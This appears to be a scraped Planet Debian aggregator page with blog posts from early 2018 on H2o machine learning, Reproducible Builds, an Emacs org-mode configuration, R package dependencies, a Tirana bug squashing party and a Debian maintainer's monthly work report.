Although this is the nearly worst case scenario (ok, the main key was not compromised!), everything went very smooth and easy, to my big surprise. Even my Debian upload ability was not interrupted considerably. All in all it shows that having subkeys on a Yubikey is a very useful and effective solution.

Norbert Preining https://www.preining.info/blog There and back again

Playing with water

Mër, 14/03/2018 - 5:00pd

I'm currently taking a machine learning class and although it is an insane amount of work, I like it a lot. I initially had planned to use R to play around with the database I have, but the teacher recommended I use H2o, a FOSS machine learning framework.

I was a bit sceptical at first since I'm already pretty good with R, but then I found out you could simply import H2o as an R library. H2o replaces most R functions by its own parallelized ones to cut down on processing time (no more doParallel calls) and uses an "external" server you have to run on the side instead of running R calls directly.

I was pretty happy with this situation, that is until I actually started using H2o in R. With the huge database I'm playing with, the library felt clunky and I had a hard time doing anything useful. Most of the time, I just ended up with long Java traceback calls. Much love.

I'm sure in the right hands using H2o as a library could have been incredibly powerful, but sadly it seems I haven't earned my black belt in R-fu yet.

I was pissed for at least a whole day - not being able to achieve what I wanted to do - until I realised H2o comes with a WebUI called Flow. I'm normally not very fond of using web thingies to do important work like writing code, but Flow is simply incredible.

Automated graphing functions, integrated ETA when running resource intensive models, descriptions for each and every model parameters (the parameters are even divided in sections based on your familiarly with the statistical models in question), Flow seemingly has it all. In no time I was able to run 3 basic machine learning models and get actual interpretable results.

So yeah, if you've been itching to analyse very large databases using state of the art machine learning models, I would recommend using H2o. Try Flow at first instead of the Python or R hooks to see what it's capable of doing.

The only downside to all of this is that H2o is written in Java and depends on Java 1.7 to run... That, and be warned: it requires a metric fuckton of processing power and RAM. My poor server struggled quite a bit even with 10 available cores and 10Gb of RAM...

Louis-Philippe Véronneau https://veronneau.org/ Louis-Philippe Véronneau

Reproducible Builds: Weekly report #149

Mër, 07/03/2018 - 4:21pd

Here's what happened in the Reproducible Builds effort between Sunday February 25 and Saturday March 3 2018:

diffoscope development

Version 91 was uploaded to unstable by Mattia Rizzolo. It included contributions already covered by posts of the previous weeks as well as new ones from:

In addition, Juliana — our Outreachy intern — continued her work on parallel processing; the above work is part of it.

reproducible-website development Packages reviewed and fixed, and bugs filed

An issue with the pydoctor documentation generator was merged upstream.

Reviews of unreproducible packages

73 package reviews have been added, 37 have been updated and 26 have been removed in this week, adding to our knowledge about identified issues.

Weekly QA work

During our reproducibility testing, FTBFS bugs have been detected and reported by:

  • Adrian Bunk (46)
  • Jeremy Bicha (4)
Misc.

This week's edition was written by Chris Lamb, Mattia Rizzolo & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Reproducible builds folks https://reproducible.alioth.debian.org/blog/ Reproducible builds blog

Skellam distribution likelihood

Mar, 06/03/2018 - 10:37md

I wondered if it was possible to make a ranking system based on the Skellam distribution, taking point spread as the only input; first step is figuring out what the likelihood looks like, so here's an example for k=4 (ie., one team beat the other by four goals):

It's pretty, but unfortunately, it shows that the most likely combination is µ1 = 0 and µ2 = 4, which isn't really that realistic. I don't know what I expected, though :-)

Perhaps it's different when we start summing many of them (more games, more teams), but you get into too high dimensionality to plot. If nothing else, it shows that it's hard to solve symbolically by looking for derivatives, as the extreme point is on an edge, not on a hill.

Steinar H. Gunderson http://blog.sesse.net/ Steinar H. Gunderson

Debian Bug Squashing Party in Tirana

Mar, 06/03/2018 - 10:15md

On 3 March I attended a Debian Bug Squashing Party in Tirana. Organized by colleagues at Open Labs Albania Anisa and friends and Daniel. Debian is the second oldest GNU/Linux distribution still active and a launchpad for so many others.

A large number of Kosovo participants took place, mostly female students. I chose to focus on adding Kosovo to country-lists in Debian by verifying that Kosovo was missing and then filing bug reports or, even better, doing pull requests.

apt-cache rdepends iso-codes will return a list of packages that include ISO codes. However, this proved hard to examine by simply looking at these applications on Debian; one would have to search through their code to find out how the ISO MA-3166 codes are used. So I left that for another time.

I moved next to what I thought I would be able complete within the event. Coding is becoming quite popular with children in Kosovo. I looked into MIT’s Scratch and Google’s Blockly, the second one being freeer software and targeting younger children. They both work by snapping together logical building blocks into a program.

Translation of Blockly into Albanian is now complete and hopefully will get much use. You can improve on my work at Translatewiki.

Thank you for the all fish and see you at the next Debian BSP.

Advertisements &b &b Arianit https://arianit2.wordpress.com debian – Arianit's Blog

Emacs #2: Introducing org-mode

Mër, 28/02/2018 - 11:09md

In my first post in my series on Emacs, I described returning to Emacs after over a decade of vim, and org-mode being the reason why.

I really am astounded at the usefulness, and simplicity, of org-mode. It is really a killer app.

So what exactly is org-mode?

I wrote yesterday:

It’s an information organization platform. Its website says “Your life in plain text: Org mode is for keeping notes, maintaining TODO lists, planning projects, and authoring documents with a fast and effective plain-text system.”

That’s true, but doesn’t quite capture it. org-mode is a toolkit for you to organize things. It has reasonable out-of-the-box defaults, but it’s designed throughout for you to customize.

To highlight a few things:

  • Maintaining TODO lists: items can be scattered across org-mode files, contain attachments, have tags, deadlines, schedules. There is a convenient “agenda” view to show you what needs to be done. Items can repeat.
  • Authoring documents: org-mode has special features for generating HTML, LaTeX, slides (with LaTeX beamer), and all sorts of other formats. It also supports direct evaluation of code in-buffer and literate programming in virtually any Emacs-supported language. If you want to bend your mind on this stuff, read this article on literate devops. The entire Worg website
    is made with org-mode.
  • Keeping notes: yep, it can do that too. With full-text search, cross-referencing by file (as a wiki), by UUID, and even into other systems (into mu4e by Message-ID, into ERC logs, etc, etc.)

Getting started

I highly recommend watching Carsten Dominik’s excellent Google Talk on org-mode. It is an excellent introduction.

org-mode is included with Emacs, but you’ll often want a more recent version. Debian users can apt-get install org-mode, or it comes with the Emacs packaging system; M-x package-install RET org-mode RET may do it for you.

Now, you’ll probably want to start with the org-mode compact guide’s introduction section, noting in particular to set the keybindings mentioned in the activation section.

A good tutorial…

I’ve linked to a number of excellent tutorials and introductory items; this post is not going to serve as a tutorial. There are two good videos linked at the end of this post, in particular.

Some of my configuration

I’ll document some of my configuration here, and go into a bit of what it does. This isn’t necessarily because you’ll want to copy all of this verbatim — but just to give you a bit of an idea of some of what can be configured, an idea of what to look up in the manual, and maybe a reference for “now how do I do that?”

First, I set up Emacs to work in UTF-8 by default.

(prefer-coding-system 'utf-8)
(set-language-environment "UTF-8")

org-mode can follow URLs. By default, it opens in Firefox, but I use Chromium.

(setq browse-url-browser-function 'browse-url-chromium)

I set the basic key bindings as documented in the Guide, plus configure the M-RET behavior.

(global-set-key "\C-cl" 'org-store-link)
(global-set-key "\C-ca" 'org-agenda)
(global-set-key "\C-cc" 'org-capture)
(global-set-key "\C-cb" 'org-iswitchb)

(setq org-M-RET-may-split-line nil)

Configuration: Capturing

I can press C-c c from anywhere in Emacs. It will capture something for me, and include a link back to whatever I was working on.

You can define capture templates to set how this will work. I am going to keep two journal files for general notes about meetings, phone calls, etc. One for personal, one for work items. If I press C-c c j, then it will capture a personal item. The %a in all of these includes the link to where I was (or a link I had stored with C-c l).

(setq org-default-notes-file "~/org/tasks.org") (setq org-capture-templates '( ("t" "Todo" entry (file+headline "inbox.org" "Tasks") "* TODO %?\n %i\n %u\n %a") ("n" "Note/Data" entry (file+headline "inbox.org" "Notes/Data") "* %? \n %i\n %u\n %a") ("j" "Journal" entry (file+datetree "~/org/journal.org") "* %?\nEntered on %U\n %i\n %a") ("J" "Work-Journal" entry (file+datetree "~/org/wjournal.org") "* %?\nEntered on %U\n %i\n %a") )) (setq org-irc-link-to-logs t)

I like to link by UUIDs, which lets me move things between files without breaking locations. This helps generate UUIDs when I ask Org to store a link target for future insertion.


(require 'org-id)
(setq org-id-link-to-org-use-id 'create-if-interactive)

Configuration: agenda views

I like my week to start on a Sunday, and for org to note the time when I mark something as done.


(setq org-log-done 'time)
(setq org-agenda-start-on-weekday 0)

Configuration: files and refiling

Here I tell it what files to use in the agenda, and to add a few more to the plain text search. I like to keep a general inbox (from which I can move, or “refile”, content), and then separate tasks, journal, and knowledge base for personal and work items.

(setq org-agenda-files (list "~/org/inbox.org" "~/org/email.org" "~/org/tasks.org" "~/org/wtasks.org" "~/org/journal.org" "~/org/wjournal.org" "~/org/kb.org" "~/org/wkb.org" )) (setq org-agenda-text-search-extra-files (list "~/org/someday.org" "~/org/config.org" )) (setq org-refile-targets '((nil :maxlevel . 2) (org-agenda-files :maxlevel . 2) ("~/org/someday.org" :maxlevel . 2) ("~/org/templates.org" :maxlevel . 2) ) ) (setq org-outline-path-complete-in-steps nil) ; Refile in a single go (setq org-refile-use-outline-path 'file)

Configuration: Appearance

I like a pretty screen. After you’ve gotten used to org a bit, you might try this.

(require 'org-bullets) (add-hook 'org-mode-hook (lambda () (org-bullets-mode t))) (setq org-ellipsis "⤵")

Coming up next…

This hopefully showed a few things that org-mode can do. Coming up next, I’ll cover how to customize TODO keywords and tags, archiving old tasks, forwarding emails to org-mode, and using git to synchronize between machines.

You can also see a list of all articles in this series.

Resources to accompany this article

John Goerzen http://changelog.complete.org The Changelog

#17: Dependencies.

Mër, 28/02/2018 - 10:45md

Dependencies are invitations for other people to break your package.
-- Josh Ulrich, private communication

Welcome to the seventeenth post in the relentlessly random R ravings series of posts, or R4 for short.

Dependencies. A truly loaded topic.

As R users, we are spoiled. Early in the history of R, Kurt Hornik and Friedrich Leisch built support for packages right into R, and started the Comprehensive R Archive Network (CRAN). And R and CRAN had a fantastic run with. Roughly twenty years later, we are looking at over 12,000 packages which can (generally) be installed with absolute ease and no suprises. No other (relevant) open source language has anything of comparable rigour and quality. This is a big deal.

And coding practices evolved and changed to play to this advantage. Packages are a near-unanimous recommendation, use of the install.packages() and update.packages() tooling is nearly universal, and most R users learned to their advantage to group code into interdependent packages. Obvious advantages are versioning and snap-shotting, attached documentation in the form of help pages and vignettes, unit testing, and of course continuous integration as a side effect of the package build system.

But the notion of 'oh, let me just build another package and add it to the pool of packages' can get carried away. A recent example I had was the work on the prrd package for parallel recursive dependency testing --- coincidentally, created entirely to allow for easier voluntary tests I do on reverse dependencies for the packages I maintain. It uses a job queue for which I relied on the liteq package by Gabor which does the job: enqueue jobs, and reliably dequeue them (also in a parallel fashion) and more. It looks light enough:

R> tools::package_dependencies(package="liteq", recursive=FALSE, db=AP)$liteq [1] "assertthat" "DBI" "rappdirs" "RSQLite" R>

Two dependencies because it uses an internal SQLite database, one for internal tooling and one for configuration.

All good then? Not so fast. The devil here is the very innocuous and versatile RSQLite package because when we look at fully recursive dependencies all hell breaks loose:

R> tools::package_dependencies(package="liteq", recursive=TRUE, db=AP)$liteq [1] "assertthat" "DBI" "rappdirs" "RSQLite" "tools" [6] "methods" "bit64" "blob" "memoise" "pkgconfig" [11] "Rcpp" "BH" "plogr" "bit" "utils" [16] "stats" "tibble" "digest" "cli" "crayon" [21] "pillar" "rlang" "grDevices" "utf8" R> R> tools::package_dependencies(package="RSQLite", recursive=TRUE, db=AP)$RSQLite [1] "bit64" "blob" "DBI" "memoise" "methods" [6] "pkgconfig" "Rcpp" "BH" "plogr" "bit" [11] "utils" "stats" "tibble" "digest" "cli" [16] "crayon" "pillar" "rlang" "assertthat" "grDevices" [21] "utf8" "tools" R>

Now we went from four to twenty-four, due to the twenty-two dependencies pulled in by RSQLite.

There, my dear friend, lies madness. The moment one of these packages breaks we get potential side effects. And this is no laughing matter. Here is a tweet from Kieran posted days before a book deadline of his when he was forced to roll a CRAN package back because it broke his entire setup. (The original tweet has by now been deleted; why people do that to their entire tweet histories is somewhat I fail to comprehened too; in any case the screenshot is from a private discussion I had with a few like-minded folks over slack.)

That illustrates the quote by Josh at the top. As I too have "production code" (well, CRANberries for one relies on it), I was interested to see if we could easily amend RSQLite. And yes, we can. A quick fork and few commits later, we have something we could call 'RSQLighter' as it reduces the dependencies quite a bit:

R> IP <- installed.packages() # using my installed mod'ed version R> tools::package_dependencies(package="RSQLite", recursive=TRUE, db=IP)$RSQLite [1] "bit64" "DBI" "methods" "Rcpp" "BH" "bit" [7] "utils" "stats" "grDevices" "graphics" R>

That is less than half. I have not proceeded with the fork because I do not believe in needlessly splitting codebases. But this could be a viable candidate for an alternate or shadow repository with more minimal and hence more robust dependencies. Or, as Josh calls, the tinyverse.

Another maddening aspect of dependencies is the ruthless application of what we could jokingly call Metcalf's Law: the likelihood of breakage does of course increase with the number edges in the dependency graph. A nice illustration is this post by Jenny trying to rationalize why one of the 87 (as of today) tidyverse packages has now state "ORPHANED" at CRAN:

An invitation for other people to break your code. Well put indeed. Or to put rocks up your path.

But things are not all that dire. Most folks appear to understand the issue, some even do something about it. The DBI and RMySQL packages have saner strict dependencies, maybe one day things will improve for RMariaDB and RSQLite too:

R> tools::package_dependencies(package=c("DBI", "RMySQL", "RMariaDB"), recursive=TRUE, db=AP) $DBI [1] "methods" $RMySQL [1] "DBI" "methods" $RMariaDB [1] "bit64" "DBI" "hms" "methods" "Rcpp" "BH" [7] "plogr" "bit" "utils" "stats" "pkgconfig" "rlang" R>

And to be clear, I do not believe in giving up and using everything via docker, or virtualenvs, or packrat, or ... A well-honed dependency system is wonderful and the right resource to get code deployed and updated. But it required buy-in from everyone involved, and an understanding of the possible trade-offs. I think we can, and will, do better going forward.

Or else, there will always be the tinyverse ...

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Dirk Eddelbuettel http://dirk.eddelbuettel.com/blog Thinking inside the box

Free software activities in February 2018

Mër, 28/02/2018 - 7:36md

Here is my monthly update covering what I have been doing in the free software world in February 2018 (previous month):

Reproducible builds

Whilst anyone can inspect the source code of free software for malicious flaws, most software is distributed pre-compiled to end users.

The motivation behind the Reproducible Builds effort is to allow verification that no flaws have been introduced — either maliciously or accidentally — during this compilation process by promising identical results are always generated from a given source, thus allowing multiple third-parties to come to a consensus on whether a build was compromised.

This month I:



I also made the following changes to diffoscope, our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues:

  • Add support for comparing Berkeley DB files. (Unfortunately this is currently incomplete because the libraries do not report metadata reliably!) (#890528)
  • Add support for comparing "XMLBeans" binary schemas. [...]
  • Drop spurious debugging code in Android tests. [...]


Debian

My activities as the current Debian Project Leader are covered in my "Bits from the DPL" email to the debian-devel-announce mailing list.

Patches contributed
  • debian-policy: Replace dh_systemd_install with dh_installsystemd. (#889167)
  • juce: Missing build-depends on graphviz. (#890035)
  • roffit: debian/rules does not override targets as intended. (#889975)
  • bugs.debian.org: Please add rel="canonical" to bug pages. (#890338)
Debian LTS

This month I have been paid to work 18 hours on Debian Long Term Support (LTS). In that time I did the following:

Uploads
  • redis:
    • 4.0.8-1 — New upstream release and fix a potential hardlink vulnerability.
    • 4.0.8-2 — Also listen on ::1 (IPv6) by default. (#891432)
  • python-django:
    • 1.11.10-1 — New upstream security release.
    • 2.0.2-1 — New upstream security release.
  • redisearch:
    • 1.0.6-1 — New upstream release.
    • 1.0.7-1 — New upstream release & add Lintian overrides for package-does-not-install-examples.
    • 1.0.8-1 — New upstream release, which includes my reproducibility-related change improvement.
  • adminer:
    • 4.6.1-1 — New upstream release and override debian-watch-does-not-check-gpg-signature as upstream do not release signatures.
    • 4.6.2-1 — New upstream release.
  • process-cpp:
    • 3.0.1-3 — Make the documentation reproducible.
    • 3.0.1-4 — Correct Vcs-Bzr to Vcs-Git.
  • sleekxmpp (1.3.3-3) — Make the build reproducible. (#890193)
  • python-redis (2.10.6-2) — Correct autopkgtest dependencies and misc packaging updates.
  • bfs (1.2.1-1) — New upstream release.

I also made misc packaging updates for docbook-to-man (1:2.0.0-41), gunicorn (19.7.1-4), installation-birthday (8) & python-daiquiri (1.3.0-3).

Finally, I performed the following sponsored uploads: check-manifest (0.36-2), django-ipware (2.0.1-1), nose2 (0.7.3-3) & python-keyczar (0.716+ds-2).

Debian bugs filed
  • zsh: Please make apt install completion work on "local" files. (#891140)
  • git-gui: Ignores git hooks. (#891552)
  • python-coverage:
    • Installs pyfile.html into wrong directory breaking HTML report generation. (#890560)
    • Document copyright information for bundled JavaScript source. (#890578)
FTP Team

As a Debian FTP assistant I ACCEPTed 123 packages: apticron, aseba, atf-allwinner, bart-view, binutils, browserpass, bulk-media-downloader, ceph-deploy, colmap, core-specs-alpha-clojure, ctdconverter, debos, designate, editorconfig-core-py, essays1743, fis-gtm, flameshot, flex, fontmake, fonts-league-spartan, fonts-ubuntu, gcc-8, getdns, glyphslib, gnome-keyring, gnome-themes-extra, gnome-usage, golang-github-containerd-cgroups, golang-github-go-debos-fakemachine, golang-github-mattn-go-zglob, haskell-regex-tdfa-text, https-everywhere, ibm-3270, ignition-fuel-tools, impass, inetsim, jboss-bridger, jboss-threads, jsonrpc-glib, knot-resolver, libctl, liblouisutdml, libopenraw, libosmo-sccp, libtest-postgresql-perl, libtickit, linux, live-tasks, minidb, mithril, mutter, neuron, node-acorn-object-spread, node-babel, node-call-limit, node-color, node-colormin, node-console-group, node-consolidate, node-cosmiconfig, node-css-color-names, node-date-time, node-err-code, node-gulp-load-plugins, node-html-comment-regex, node-icss-utils, node-is-directory, node-mdn-data, node-mississippi, node-mutate-fs, node-node-localstorage, node-normalize-range, node-postcss-filter-plugins, node-postcss-load-options, node-postcss-load-plugins, node-postcss-minify-font-values, node-promise-retry, node-promzard, node-require-from-string, node-rollup, node-rollup-plugin-buble, node-ssri, node-validate-npm-package-name, node-vue-resource, ntpsec, nvidia-cuda-toolkit, nyx, pipsi, plasma-discover, pokemmo, pokemmo-installer, polymake, privacybadger, proxy-switcher, psautohint, purple-discord, pytest-astropy, pytest-doctestplus, pytest-openfiles, python-aiomeasures, python-coverage, python-fitbit, python-molotov, python-networkmanager, python-os-service-types, python-pluggy, python-stringtemplate3, python3-antlr3, qpack, quintuple, r-cran-animation, r-cran-clustergeneration, r-cran-phytools, re2, sat-templates, sfnt2woff-zopfli, sndio, thunar, uhd, undertime, usbauth-notifier, vmdb2 & xymonq.

I additionally filed 15 RC bugs against packages that had incomplete debian/copyright files against: browserpass, designate, fis-gtm, flex, gnome-keyring, ibm-3270, knot-resolver, libopenraw, libtest-postgresql-perl, mithril, mutter, ntpsec, plasma-discover, pytest-arraydiff & r-cran-animation.

Chris Lamb https://chris-lamb.co.uk/blog/category/planet-debian lamby: Items or syndication on Planet Debian.

Things that really matter

Mër, 28/02/2018 - 5:34md


gwolf http://gwolf.org Gunnar Wolf

Faqet